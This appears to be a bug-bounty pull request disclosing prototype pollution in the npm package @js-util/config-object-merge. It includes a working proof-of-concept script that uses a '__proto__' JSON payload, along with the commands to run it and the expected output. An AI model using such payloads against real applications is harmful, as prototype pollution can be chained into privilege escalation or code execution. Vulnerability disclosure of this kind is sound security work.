### PR TITLE
Prototype Pollution in @js-util/config-object-merge

### DIFF
--- a/bounties/npm/@js-util/config-object-merge/1/README.md
+++ b/bounties/npm/@js-util/config-object-merge/1/README.md
@@ -1,0 +1,31 @@
+# Description
+
+`@js-util/config-object-merge` is vulnerable to `Prototype Pollution`.
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```
+// poc.js
+var configObjectMerge = require("@js-util/config-object-merge")
+const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
+var obj = {}
+console.log("Before : " + {}.polluted);
+configObjectMerge(obj, payload);
+console.log("After : " + {}.polluted);
+```
+
+
+2. Execute the following commands in terminal:
+
+```
+npm i @js-util/config-object-merge # Install affected module
+node poc.js #  Run the PoC
+```
+
+3. Check the Output:
+```
+Before : undefined
+After : Yes! Its Polluted
+```


### PR DESCRIPTION
`@js-util/config-object-merge` is vulnerable to `Prototype Pollution`